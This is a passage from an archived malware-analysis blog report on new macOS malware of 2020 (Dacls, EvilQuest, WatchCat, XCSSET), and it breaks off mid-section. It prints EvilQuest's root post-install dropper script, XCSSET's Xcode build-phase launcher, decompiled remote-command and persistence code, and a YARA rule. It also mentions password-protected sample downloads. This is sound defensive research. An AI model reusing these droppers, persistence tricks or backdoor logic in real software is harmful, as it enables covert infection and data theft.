{ "id": "fd3d55aa-1871-4d3e-859b-b2104b3de783", "created_at": "2026-04-06T00:13:14.084168Z", "updated_at": "2026-04-10T03:38:19.157844Z", "deleted_at": null, "sha1_hash": "bf512036c3e5a2143435037b5c30accba8a3ee56", "title": "The Mac Malware of 2020 ??????", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 11326705, "plain_text": "The Mac Malware of 2020 👾\r\nArchived: 2026-04-05 22:47:34 UTC\r\nThe Mac Malware of 2020 👾\r\na comprehensive analysis of the year's new malware\r\nby: Patrick Wardle / January 1, 2021\r\n📝 👾 Want to play along?\r\nAll samples covered in this post are available in our malware collection.\r\n…just make sure not to infect yourself!!\r\n️ Printable\r\nA printable (PDF) version of this report can be downloaded here:\r\nThe Mac Malware of 2020.pdf\r\n⌛ Background\r\nGoodbye, and good riddance 2020 …and hello 2021! 🥳\r\nIn recent years, malicious programs targeting macOS have grown in prevalence (and sophistication), perhaps even\r\nreaching parity with Microsoft Windows platforms. This is well illustrated in Malwarebytes’ “2020 State of\r\nMalware Report”:\r\n\"And for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint.\" -\r\nMalwarebytes\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 1 of 62\n\nThreats per endpoint, Macs vs. Windows (credit: Malwarebytes)\r\nIt is important to note these statistics include both adware (and potentially unwanted programs). And the reality is,\r\nif a Mac user is infected with malicious code, more than likely it will be adware (vs. a sophisticated nation-state\r\nbackdoor):\r\n\"The vast majority of threats for macOS in [recent years] were in the AdWare category.\" -Kaspersky\r\nHowever, it is wise not to underestimate the potential impact of adware, upon its victims. The noted security\r\nresearcher, Thomas Reed articulates this well in writeup titled “Mac adware is more sophisticated and dangerous\r\nthan traditional Mac malware”:\r\n\"However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real”\r\nmalware. They can intercept and decrypt all network traffic, create hidden users with static passwords,\r\nmake insecure changes to system settings, and generally dig their roots deep into the system so that it is\r\nincredibly challenging to eradicate completely.\" -Thomas Reed\r\n…now, back to malware! For the fifth year in a row, I’ve decided to put together a blog post that aims to\r\ncomprehensively cover all the new Mac malware that appeared during the course of the year. While the malware\r\nmay have been reported on before (i.e. by the AV company that discovered them), this blog aims to cumulatively\r\nand comprehensively cover all the new Mac malware of 2020 in one place …yes, with samples of each malware\r\nfor download, so that you can play along! #SharingIsCaring\r\nIn this blog post, we focus on new Mac malware specimens or new variants that appeared in 2020. Adware and/or\r\nmalware from previous years, are not covered.\r\nHowever at the end of this blog, I’ve included a brief section dedicated to these other threats, that includes links to\r\ndetailed write-ups.\r\nFor each malicious specimen covered in this post, we’ll identify the malware’s:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 2 of 62\n\nInfection Vector:\r\nHow it was able to infect macOS systems.\r\nPersistence Mechanism:\r\nHow it installed itself, to ensure it would be automatically restarted on reboot/user login.\r\nFeatures \u0026 Goals:\r\nWhat was the purpose of the malware? a backdoor? a cryptocurrency miner? or something more\r\ninsidious…\r\nAlso, for each malware specimen, I’ve added a direct download link in case you want to follow along with our\r\nanalysis or dig into the malware more!\r\n️ Malware Analysis Tools \u0026 Tactics\r\nThroughout this blog, we’ll reference various tools used in analyzing the malware specimens.\r\nThese include:\r\nProcessMonitor\r\nOur user-mode (open-source) utility that monitors process creations and terminations, providing detailed\r\ninformation about such events.\r\nFileMonitor\r\nOur user-mode (open-source) utility monitors file events (such as creation, modifications, and deletions)\r\nproviding detailed information about such events.\r\nWhatsYourSign\r\nOur (open-source) utility that displays code-signing information, via the UI.\r\nNetiquette\r\nOur (open-source) network monitor.\r\nlldb\r\nThe de-facto commandline debugger for macOS. Installed (to /usr/bin/lldb ) as part of Xcode.\r\nHopper Disassembler\r\nA “reverse engineering tool (for macOS) that lets you disassemble, decompile and debug your\r\napplications” …or malware specimens!\r\n️ Timeline\r\n05/2020\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 3 of 62\n\nA macOS port of a Lazarus group cross-platform backdoor.\r\n06/2020\r\nA insidious virus, will ransomware capabilities.\r\nWatchCat\r\n07/2020\r\nThe latest Lazarus APT group backdoor.\r\nXCSSET\r\n08/2020\r\nTargeting developers this malware leverages various 0days to steal passwords and exfiltrate data.\r\nFinSpy\r\n09/2020\r\nA commercial cross-platform implant, supporting a myriad of cyber espionage features \u0026 capabilities.\r\nIPStorm\r\n10/2019\r\nA cross platform botnet, ...now ported to macOS.\r\nGravityRAT\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 4 of 62\n\n11/2019\r\nA cross-platform first-stage downloader for a RAT, ...now ported to macOS.\r\n👾 OSX.Dacls\r\nDacls is a macOS port of the cross-platform Dacls RAT (created by the Lazarus APT group), which affords a\r\nremote attacker complete control over an infected system.\r\n Download: OSX.Dacls (password: infect3d )\r\nDacls originally was discovered in 2019, but at that time was only seen targeting Windows and Linux systems:\r\n\"Dacls is a RAT that was discovered by Qihoo 360 NetLab in December 2019 as a fully functional\r\ncovert remote access Trojan targeting the Windows and Linux platforms.\" -Malwarebytes\r\n…in 2020, MalwareBytes uncovered a macOS variant.\r\n Writeups:\r\n“The Dacls RAT …now on macOS!”\r\n“New Mac variant of Lazarus Dacls RAT distributed via Trojanized 2FA app”\r\n Infection Vector: Trojanized (2FA) Application\r\nMalwareBytes, who uncovered the Mac variant of OSX.Dacls , note:\r\n\"[the] Mac version is ...distributed via a Trojanized two-factor authentication application for macOS\r\ncalled MinaOTP\"\r\nThe trojanized application was (re)named TinkaOTP , and distributed via disk image TinkaOTP.dmg\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 5 of 62\n\n…it is likely that the attackers relied on social engineering efforts, having to coerce macOS users to download and\r\nrun trojanized application. This is the de-factor infection mechanism leveraged by Lazarus group for many years\r\n(to target macOS users).\r\nFor example back in 2018, after creating a fake crypto-currency site, they emailed users with links to download\r\nOSX.AppleJeus :\r\nOSX.AppleJeus infection vector\r\nThe application, TinkaOTP.app is signed “adhoc-ly” (as the Lazarus group often does):\r\n$ codesign -dvvv /Volumes/TinkaOTP/TinkaOTP.app\r\nExecutable=/Volumes/TinkaOTP/TinkaOTP.app/Contents/MacOS/TinkaOTP\r\nIdentifier=com.TinkaOTP\r\nFormat=app bundle with Mach-O thin (x86_64)\r\n...\r\nSignature=adhoc\r\nThis also means that on modern versions of macOS (unless some exploit is first used to gain code execution on\r\nthe target system), the application will not (easily) run:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 6 of 62\n\nmacOS blocking TinkaOTP.app\r\nLet’s now take a closer look at the application bundle of TinkaOTP.app :\r\nTinkaOTP Application Bundle\r\nIf the user runs the (trojanized) application, infection will commence. Specifically, /Contents/MacOS/TinkaOTP\r\nbinary will copy a file from within its application bundle ( Resources/Base.lproj/SubMenu.nib ), to\r\n~/Library/.mina and then executing it.\r\nThis can be passively observed via our ProcessMonitor :\r\n# ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"pid\" : 864\r\n \"path\" : \"/bin/cp\",\r\n \"arguments\" : [\r\n \"cp\",\r\n \"/Volumes/TinkaOTP/TinkaOTP.app/Contents/Resources/Base.lproj/SubMenu.nib\",\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 7 of 62\n\n\"/Users/user/Library/.mina\"\r\n ]\r\n ...\r\n }\r\n}\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_EXEC\",\r\n \"process\" : {\r\n \"pid\" : 866\r\n \"path\" : \"/Users/user/Library/.mina\",\r\n \"arguments\" : [\r\n \"/Users/user/Library/.mina\"\r\n ]\r\n ...\r\n }\r\n}\r\n Persistence: Launch Item\r\nOSX.Dacls persists as a launch item ( com.aex.lop.agent.plist ).\r\nIf running as root, it will persists as a launch daemon, otherwise, as a user launch agent.\r\nThe binary SubMenu.nib (which recall, was copied to ~/Library/.mina ) contains both a template for, and path\r\nto, the persistent launch item property list:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 8 of 62\n\nOSX.Dacl's launch item template\r\nOSX.Dacl's launch item path\r\nVia our FileMonitor , one can passively observe the malware creating the launch item (here a user launch agent,\r\n~/Library/LaunchAgents/com.aex-loop.agent.plist ):\r\n# FileMonitor/Contents/MacOS/FileMonitor -pretty\r\n{\r\n \"event\" : \"ES_EVENT_TYPE_NOTIFY_CREATE\",\r\n \"file\" : {\r\n \"destination\" : \"/Users/user/Library/LaunchAgents/com.aex-loop.agent.plist\",\r\n \"process\" : {\r\n \"path\" : \"/Users/user/Library/.mina\",\r\n \"pid\" : 931\r\n ...\r\n }\r\n }\r\n}\r\nAs the value for the RunAtLoad key in com.aex-loop.agent.plist is set to true, the malware will be\r\nautomatically (re)started by macOS each time the system is rebooted (and the user logs in).\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 9 of 62\n\nCapabilities: Persistent Backdoor (+ plugins).\r\nWe noted that OSX.Dacls is a macOS port of a Windows/Linux RAT. The initial report on the (Windows/Linux\r\nversions of the) Dacls RAT, was published in December 2019, by Netlab. Titled, “Dacls, the Dual platform RAT”.\r\nIn terms of the RATs capabilities, the report noted it utilizes a modular plugin architecture:\r\n\"[Dacls] uses static compilation to compile the plug-in and Bot code together. By sending different\r\ninstructions to call different plug-ins, various tasks can be completed.\r\nThe main functions of …Dacls Bot include: command execution, file management, process\r\nmanagement, test network access, C2 connection agent, network scanning module.\" -Netlab\r\nThe report describes various plugins such as a:\r\nFile plugin\r\nProcess plugin\r\n“Test” plugin\r\n“Reverse P2P” plugin\r\n“LogSend” plugin\r\nAnalyzing the malware’s disassembly (specifically searching for LoadPlugin_ * functions), we can see that the\r\nmacOS variant of Dacls supports these same plugins (plus several others, such as SOCKS plugin):\r\nOSX.Dacl's Plugins\r\nVia these plugins a remote attackers can interact with and fully control an infected system by:\r\nExecuting system commands\r\nProcess actions, such as listing, creating, \u0026 terminating\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 10 of 62\n\nFile action such as upload/download, read/write, \u0026 deleting\r\n…and more (such as performing network scans).\r\n👾 OSX.EvilQuest\r\nEvilQuest (also known as ThiefQuest) is a (true) computer virus, that also provides remote tasking and\r\nransomware logic.\r\n Download: OSX.EvilQuest (password: infect3d )\r\nThe noted Malware researcher Dinesh Devadoss discovered OSX.EvilQuest and tweeted about its ransomware\r\ntendencies and impersonation as Google Software update:\r\nFurther analysis uncovered other insidious capabilities, including the ability to virally infected other binaries on an\r\ninfected system!\r\n Writeups:\r\n“OSX.EvilQuest Uncovered (Part 1)”\r\n“OSX.EvilQuest Uncovered (Part 2)”\r\n“Updates on ThiefQuest, the Quickly-Evolving macOS Malware”\r\n Infection Vector: Pirated Software\r\nFrom Dinesh’s tweet, it was not apparent how the malware was able to infect macOS users. However, Thomas\r\nReed of Malwarebytes, noted that the malware had (also?) been found in pirated versions of popular macOS\r\nsoftware, shared on popular torrent sites:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 11 of 62\n\nPirated Application, Infected with OSX.EvilQuest (credit: Malwarebytes)\r\nEthical reasons aside, it's generally unwise to install pirated software, as it is often infected with malware.\r\n“Torrent sites are notorious for distributing malware and adware, sometimes through misleading advertisements,\r\nand sometimes through Trojan horse downloads that claim to be ‘cracks’ or that may contain infected copies of\r\nlegitimate software” -Intego\r\nThe sample analyzed here, was packaged in a pirated version of the popular DJ software Mixed In Key. The\r\nmalicious package was unsigned …meaning macOS will prompt the user before allowing it to be opened:\r\nOSX.EvilQuest Infection Vector\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 12 of 62\n\nHowever, macOS users attempting to pirate software will likely ignore this warning, pressing onwards …ensuring\r\ninfection commences.\r\nWe can use the Suspicious Package utility to statically examine the package contetns. It contains an application\r\nnamed Mixed In Key 8 and binary named “ patch ”:\r\nClicking on the “All Scripts” tab, we find also find a post install script:\r\n1#!/bin/sh\r\n2mkdir /Library/mixednkey\r\n3\r\n4mv /Applications/Utils/patch /Library/mixednkey/toolroomd\r\n5rmdir /Application/Utils\r\n6\r\n7chmod +x /Library/mixednkey/toolroomd\r\n8\r\n9/Library/mixednkey/toolroomd \u0026\r\nThis post install script (which is executed during the package installation) will first create a /Library/mixednkey\r\ndirectory. Then, it moves the patch binary into this directory (renaming it toolroomd ), sets it to be executable\r\n…and then launches it.\r\nAs the installer requests root privileges during the install, this script (and thus the toolroomd binary) will also\r\nrun with root privileges:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 13 of 62\n\nAs the \"Mixed In Key 8\" binary is (still) validly signed by the Mixed In Key developers, it is likely pristine and\r\nunmodified\r\n…the malicious components of the package, are thus the post install script and the patch binary.\r\n Persistence: Launch Item\r\nDepending on its privilege level, OSX.EvilQuest persists either as a user launch agent, or a launch daemon (and a\r\nlaunch agent). The code responsible for this logic is found within a function named ei_persistence_main .\r\nAfter invoking various anti-analysis logic (e.g. debugger check), the function then invokes a helper function,\r\npersist_executable to install the malware. If the malware is running with non-root privileges it copy itself to\r\n~/Library/AppQuest/com.apple.questd . However, if running as root, it will also copy itself to\r\n/Library/AppQuest/com.apple.questd .\r\nOnce the malware has copied itself, it persists via a launch item. The code that performs this persistence is found\r\nin the install_daemon function (invoked by ei_persistence_main ). If running as non-root, it persists as a\r\nlaunch agent: ~/Library/LaunchAgents/com.apple.questd.plist . If the malware is running with root privileges\r\nit will invoke the install_daemon function again, but this time specifying that a launch daemon should be\r\ncreated.\r\nAfter the malware has ensured it is persisted (twice, if running as root!), it invokes the ei_selfretain_main\r\nfunction to start the launch item(s). This function invokes the aptly named run_daemon which in turn invokes\r\nmacOS’s osascript binary to launch the items via an AppleScript command:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 14 of 62\n\nOSX.EvilQuest launch item persistence\r\nThe template for the property list for these launch item(s) is stored as an encrypted string within the malware.\r\nAs the RunAtLoad is set to true in the malware’s launch item plist ( com.apple.questd.plist ), macOS will\r\nautomatically restart the malware on subsequent reboots.\r\n Capabilities: File Exfiltration, Remote Tasking, Ransomware, Viral Infection ...and more!\r\nOne of the first actions taking by OSX.EvilQuest , is to scan an infected system for various files that match a list\r\nof embedded regular expressions. From these regexes, we can ascertain that the malware has a propensity for\r\ncertificates and crypto-currency keys \u0026 wallets:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 15 of 62\n\nOSX.EvilQuest's file exfiltration\r\nAny file on the infected system that matches any of these regexes will be exfiltrated to the attacker (including, as\r\nshown above, a test file, key.png ).\r\nThe malware also supports remote tasking, including the following:\r\nTask 0x1 : react_exec\r\nThe react_exec command appears to execute a payload received from the server. Interestingly it attempts\r\nto first execute the payload directly from memory! Specifically it invokes a function named\r\nei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory , NSLinkModule ,\r\nNSLookupSymbolInModule , and NSAddressOfSymbol APIs to load and link the in-memory payload.\r\nAt a previous BlackHat talk (“Writing Bad @$$ Malware for OS X”), I discussed this technique (an noted\r\nApple used to host sample code to implement such in-memory execution):\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 16 of 62\n\nIf the in-memory execution fails, the malware writes out the payload to a file named .xookc , sets it to be\r\nexecutable (via chmod ), then executes via a call to system .\r\nTask 0x2 : react_save\r\nThe react_save decodes data received from the server and saves it to a file. It appears the file name is\r\nspecified by the server as well. In some cases the file will be set to executable via a call to chmod .\r\nTask 0x4 : react_start\r\nThis method is a nop, and does nothing:\r\n1int react_start(int arg0) {\r\n2 return 0x0;\r\n3}\r\nTask 0x8 : react_keys\r\nThe react_keys command starts a keylogger. Specifically it instructs the malware to spawn a background\r\nthread to execute a function named eilf_rglk_watch_routine . This function creates an event tap (via the\r\nCGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate\r\nthe event tap.\r\nOnce the tap is activated, keypresses (e.g. by the user) will be delivered to the process_event function,\r\nwhich then converts the the raw keypresses “readable” key codes (via the kconvert function). Somewhat\r\ninterestingly, the malware then passes the converted key code to the printf function …to print them out?\r\n(You’d have thunk it would write them to a file …). Perhaps this part of code is not quite done (yet)!\r\nTask 0x10 : react_ping\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 17 of 62\n\nThe react_ping command simply compares a value from the server with the (now decrypted) string \"Hi\r\nthere\" . A match causes this command to return “success”, which likely just causes the malware to\r\nrespond to the server for (more) tasking.\r\nTask 0x20 : react_host\r\nThis method is a nop, and does nothing:\r\n1int react_host(int arg0) {\r\n2 return 0x0;\r\n3}\r\nTask 0x40 : react_scmd\r\nThe react_scmd command will execute a command from the server via the popen API:\r\n1__text:0000000100009EDD mov rdi, [rbp+var_18] ; char *\r\n2__text:0000000100009EE1 lea rsi, aR ; \"r\"\r\n3__text:0000000100009EE8 mov [rbp+var_70], rax\r\n4__text:0000000100009EEC call _popen\r\nThe response (output) of the command is read, and transmitted about to the server via the\r\neicc_serialize_request and http_request functions.\r\nThe most readily observable side-affect of an OSX.EvilQuest infection is its file encryption (ransomware)\r\nactivities.\r\nAfter the malware has invoked a method named _s_is_high_time and waited on several timers to expire, it\r\nbegins encrypting the (unfortunate) user’s files, by invoking a function named carve_target .\r\nThe carve_target first begins the key generation process via a call to the random API, and functions named\r\neip_seeds and eip_key . It then generates a list of files to encrypt, by invoking the get_targets function,\r\npassing in the is_file_target as a filter function. This filter function filters out all files, except those that match\r\ncertain file extensions. The encrypted list of extensions is hard-coded in the malware.\r\nArmed with a list of target files (that match the above extensions), the malware completes the key generation\r\nprocess (via a call to random_key , which in turn calls srandom and random ), before calling a function named\r\ncarve_target on each file.\r\nThe carve_target function is invoked with the path of the file to encrypt, the result of the call to random_key ,\r\nas well as values from returned by the calls to eip_seeds and eip_key .\r\nIt takes the following actions:\r\n1. Makes sure the file is accessible via a call to stat\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 18 of 62\n\n2. Creates a temporary file name, via a call to a function named make_temp_name\r\n3. Opens the target file for reading\r\n4. Checks if the target file is already encrypted via a call to a function named is_carved (which checks for\r\nthe presence of BEBABEDD at the end of the file).\r\n5. Open the temporary file for writing\r\n6. Read(s) 0x4000 byte chunks from the target file\r\n7. Invokes a function named tpcrypt to encrypt the (0x4000) bytes\r\n8. Write out the encrypted bytes to the temporary file\r\n9. Repeats steps 6-8 until all bytes have been read and encrypted from the target file\r\n10. Invokes a function named eip_encrypt to encrypt (certain?) keying information which is then appended\r\nto the temporary file\r\n11. Writes 0DDBEBABE to end of the temporary file (as noted by Dinesh Devadoss)\r\n12. Deletes the target file\r\n13. Renames the temporary file to the target file\r\nOSX.EvilQuest's file ransom logic\r\nOnce all the files in the list of target files have been encrypted, the malware writes out the following to a file\r\nnamed READ_ME_NOW.txt :\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 19 of 62\n\nOSX.EvilQuest's ransom note\r\nTo make sure the user reads this file, it displays the following modal prompt, and reads it aloud via macOS built-in\r\nsay command:\r\nOSX.EvilQuest's ransom alert\r\nThe most unique feature of OSX.EvilQuest is its capabilities to (locally) virally propagate. In short, the malware\r\ngenerates a list of executables on the system, the invokes a method named append_ai to inject itself into the\r\nbinary:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 20 of 62\n\nOSX.EvilQuest's viral infection logic\r\nThe following image illustrates the details of the viral infection:\r\nOSX.EvilQuest's viral infection logic\r\nTo ensure the infected binary acts “normal” (i.e. runs its original code so that nothing appears amiss), the viral\r\ncode writes the programs original bytes out to a new file named: .\u003corginalfilename\u003e1. This file is then set\r\nexecutable (via chmod) and executed (via execl).\r\nBy injecting itself into the start of the (other) binaries on the system, the malware ensures that it is rather difficult\r\nto remove!\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 21 of 62\n\n👾 OSX.WatchCat\r\nWatchCat appears to be a Lazarus APT group creation, that builds off previous backdoors …while adding new\r\ncapabilities.\r\n Download: OSX.WatchCat (password: infect3d )\r\nAs noted by the macOS security researcher Scott Knight, information about OSX.WatchCat was made public via\r\nthe addition of an XProtect signature (version 2127):\r\nXProtect 2127 adds two new rules to detect \"watchcat\". VT engines label it as NukeSpeed. Could be\r\nLazarus related.\r\n3bb96bfaf492782b38985f4bd6b7e7f9dc22c1332b42bb74b16041298fd31f93\r\n— Scott Knight (@sdotknight) July 24, 2020\r\nScanning the malicious binary via UXProtect, shows a match on XProtect_MACOS_580a1bc :\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 22 of 62\n\n$ cd /Library/Apple/System/Library/CoreServices/\r\n$ cat XProtect.bundle/Contents/Resources/XProtect.yara\r\nrule XProtect_MACOS_580a1bc\r\n{\r\n meta:\r\n description = \"MACOS.580a1bc\"\r\n strings:\r\n $s1 = { 73 77 5F 76 65 72 73 20 2D 70 72 6F 64 75 63 74 4E 61 6D 65 }\r\n $s2 = { 73 77 5F 76 65 72 73 20 2D 70 72 6F 64 75 63 74 56 65 72 73 69 6F 6E }\r\n $s3 = { 73 77 5F 76 65 72 73 20 2D 62 75 69 6C 64 56 65 72 73 69 6F 6E }\r\n $s4 = { 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 4D 61 63 69 6E 74 6F 73 ... }\r\n $s5 = { 63 6F 6D 2E 61 70 70 6C 65 2E 77 61 74 63 68 63 61 74 2E 70 6C 69 73 74 }\r\n condition:\r\n Macho and filesize \u003c 500KB and all of them\r\n}\r\n Writeups:\r\n“Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform”\r\n Infection Vector: Unknown\r\nUnfortunately the XProtect signature and a binary sample is all the (public) information we have about\r\nOSX.WatchCat …meaning its infection vector remains unknown. However, Lazarus APT group (the likely\r\nauthors of this malware) are rather fond of packaging up their backdoors in trojanized applications:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 23 of 62\n\n…thus, it’s possible that OSX.WatchCat is distributed in a similar manner.\r\n Persistence: Launch Daemon\r\nTaking a peak at the OSX.WatchCat binary, we find an embedded launch daemon property list:\r\nThis (embedded) plist is referenced from a function named InsertToLaunchDaemons :\r\n 1int _InsertToLaunchDaemons(int arg0, int arg1) {\r\n 2 plist = malloc(strlen(arg0) + 0x400);\r\n 3 sprintf_chk(plist, 0x0, 0xffffffffffffffff, \"\u003c?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?\u003e\\n\u003c!DOCTYPE plist P\r\n 4\r\n 5 sprintf_chk(path, 0x0, 0x104, \"/Library/LaunchDaemons/%s\", \"com.apple.watchcat.plist\");\r\n 6 file = fopen(path, \"wb\");\r\n 7 if (file != 0x0) {\r\n 8 fwrite(plist, strlen(plist), 0x1, rbx);\r\n 9 fclose(file);\r\n10 chmod(path, 444o);\r\n11 }\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 24 of 62\n\n12 ...\r\n13}\r\nThe above code first formats the property lists (i.e. adds the full path the malware’s binary image), and builds a\r\npath to the launch daemon ( /Library/LaunchDaemons/com.apple.watchcat.plist ). It then writes out the (now\r\nconfigured) plist.\r\nAs the RunAtLoad key is set to true the malware will be automatically (re)started each time the system is\r\nrebooted.\r\n…however the first time (i.e. prior to reboot), the malware manually starts the launch daemon via the\r\nSinLaunchCTL function. This function simply invokes launchctl load on the launch daemon plist\r\n( com.apple.watchcat.plist ):\r\n1int SinLaunchCTL() {\r\n2 sprintf_chk(path, 0x0, 0x104, \"/Library/LaunchDaemons/%s\", \"com.apple.watchcat.plist\");\r\n3 sprintf_chk(command, 0x0, 0x200, \"launchctl load %s \u003e /dev/null 2\u003e\u00261 \u0026\", path);\r\n4 rax = popen(command, \"r\");\r\n5 ...\r\n6}\r\n Capabilities: Backdoor, plus \"webshell\"\r\nMac malware analyst Phil Stokes notes in a recent writeup:\r\n\"...there are some overlaps with the earlier [Lazarus Group] backdoor samples ...there is also much\r\nmore to this malware that has not been seen in the other samples, including use of a WebShell.\r\nBefore taking a look at the webshell, let’s discuss OSX.WatchCat ’s download and execute functionality.\r\nTo execute external commands and processes, the malware invokes the popen system API. By looking at cross-references (x-refs) to this API, we can find the code responsible for executing commands from the server:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 25 of 62\n\nThe malware’s MsgCmd function, invokes popen on a passed in argument:\r\n1int MsgCmd(int arg0) {\r\n2 buffer = malloc(SAR(0x1000000000 + (strlen(arg0) \u003c\u003c 0x20), 0x20));\r\n3 __sprintf_chk(buffer, 0x0, 0xffffffffffffffff, \"%s 2\u003e\u00261\", arg0);\r\n4 popen(buffer, \"r\");\r\n5}\r\nWorking backwards, we see that the MsgCmd function is invoked from the CmdProc function. The CmdProc first\r\ninvokes the SendMsgOnlyType function (to send an message to a remote command \u0026 control server via the curl\r\nAPIs). Then parses the response and acts upon it:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 26 of 62\n\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 27 of 62\n\nAs (just) noted, the MsgCmd will executed the specified command.\r\nOther commands appear to provide a remote attacker the ability to:\r\ndownload files\r\nupload files\r\nkill a process ( MsgPK )\r\ndelete a file ( MsgSdel )\r\n…and more!\r\nAs Phil noted, this is similar to the capabilities afforded by other Lazarus Group backdoors (such as OSX.Yort).\r\nAlso though he noted the addition of the “use of a WebShell.”\r\nThe “webshell” logic is found in the Auth_WebShell function (which is invoked in a loop by the malware’s\r\nStart function). It appears to be a simple check in, with a value of 259D7B1TE1002A65 :\r\n 1int Auth_WebShell() {\r\n 2 ...\r\n 3 rax = rand();\r\n 4 _g_nBoardID = rax + -((0xffffffffe90452d5 * rax \u003e\u003e 0x2d) * 0x2328) + 0x3e8;\r\n 5 *(\u0026var_60 + 0x8) = '56A2001E';\r\n 6 var_60 = 'T1B7D952';\r\n 7\r\n 8 var_A4 = rand();\r\n 9 rax = SendRawData(_g_HttpSetting, ..., \u0026var_60, \u0026var_A4, 0x4);\r\n10 if (rax != 0x0) {\r\n11 rbx = 0x0;\r\n12 rax = RecvRawData(\u0026var_80, 0x4);\r\n13 if (rax != 0x0) {\r\n14 __sprintf_chk(\u0026var_A0, 0x0, 0x20, \"%04d\", *(int32_t *)_g_nBoardID);\r\n15 rax = strcmp(\u0026var_A0, \u0026var_80);\r\n16 rbx = rax == 0x0 ? 0x1 : 0x0;\r\n17 }\r\n18 }\r\n19 ...\r\n20 return rax;\r\n21}\r\n👾 OSX.XCSSET\r\nXCSSET is rather unique, as it targets macOS developers (Xcode users) and leverages several 0days to steal\r\npasswords and exfiltrate data.\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 28 of 62\n\nDownload: OSX.XCSSET (password: infect3d )\r\nIn July, I noticed that Apple’s XProtect update (v. 2126) had added a new signature for a sample Cupertino named\r\nMACOS.2070d41 :\r\n…in wasn’t till August, when TrendMicro researchers released their report on (and IoCs for) OSX.XCSSET that we\r\nlearned more about this intriguing malware.\r\n\"We have discovered an unusual infection related to Xcode developer projects. Upon further\r\ninvestigation, we discovered that a developer’s Xcode project at large contained the source malware\r\n[OSX.XCSSET], which leads to a rabbit hole of malicious payloads.\" -TrendMicro\r\n Writeups:\r\n“Mac malware exposed: XCSSET, an advanced new threat”\r\n“What is OSX.XCSSET malware and what should I do about it?”\r\n“XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers,\r\nLeverages Zero-day Exploits”\r\n Infection Vector: (user-downloaded) Xcode Projects\r\nXcode is the de-facto IDE for developing software for Apple devices (iOS, macOS, etc.). It appears that\r\nOSX.XCSSET was originally discovered hiding within various developer’s Xcode projects. Several of these\r\ninfected projects were found/hosted online (on Github).\r\nIf an XCSSET-infected Xcode project is downloaded and built, the malicious code will be automatically run and\r\nthe developer’s Mac will be infected.\r\nTrendMicro explains:\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 29 of 62\n\n\"This threat primarily spreads via Xcode projects... It is not yet clear how the threat initially enters these\r\nsystems. Presumably, these systems would be primarily used by developers. These Xcode projects have\r\nbeen modified such that upon building, these projects would run a malicious code.\r\nThis eventually leads to the main XCSSET malware being dropped and run on the affected system.\r\nInfected users are also vulnerable to having their credentials, accounts, and other vital data stolen.\" -\r\nTrendMicro\r\nExamining an Xcode project infected with OSX.XCSSET , reveals a script in the project’s project.pbxproj file\r\nthat executes another script ( Assets.xcassets ) from a hidden directory ( .xcassets/ ):\r\nmalicious build script in an OSX.XCSSET-infected Xcode project\r\nTaking a peek at this Assets.xcassets script, reveals it executes a binary named xcassets …which is the core\r\ncomponent of the malware:\r\n1cd \"${PROJECT_FILE_PATH}/xcuserdata/.xcassets/\"\r\n2xattr -c \"xcassets\"\r\n3chmod +x \"xcassets\"\r\n4./xcassets \"${PROJECT_FILE_PATH}\" true%\r\nAs noted, building the infected project will trigger the execution of the script(s).\r\n Persistence: None(?)\r\nIt appears that OSX.XCSET does not persist, but rather relies on the user triggering both the initial infection and\r\n(subsequent) re-executions of the malware …for example building an infected Xcode project, or running one of\r\nthe applications it modifies.\r\nHowever, due to the primary goals of the malware (credential stealing and file exfiltration), there may be no need,\r\nnor advantage, to the malware persisting.\r\nIn terms of application modifications (which can lead to “persistence” via user interactions), OSX.XCSSET\r\nmodifies (references) Safari (not the actual Safari.app which would invalidate the code signature).\r\nhttps://objective-see.com/blog/blog_0x5F.html\r\nPage 30 of 62\n\nThe TrendMicro report notes:\r\n\"This is done so that when the infected user wants to open the normal Safari browser, the fake one will\r\nget executed instead.\r\n...functionally, this means that the fake Safari browser runs instead of the legitimate version of Safari.\" -\r\nTrendMicro\r\nIt should also be noted that several of the malware’s modules reference launch agent property lists …property lists\r\nthat are likely related to 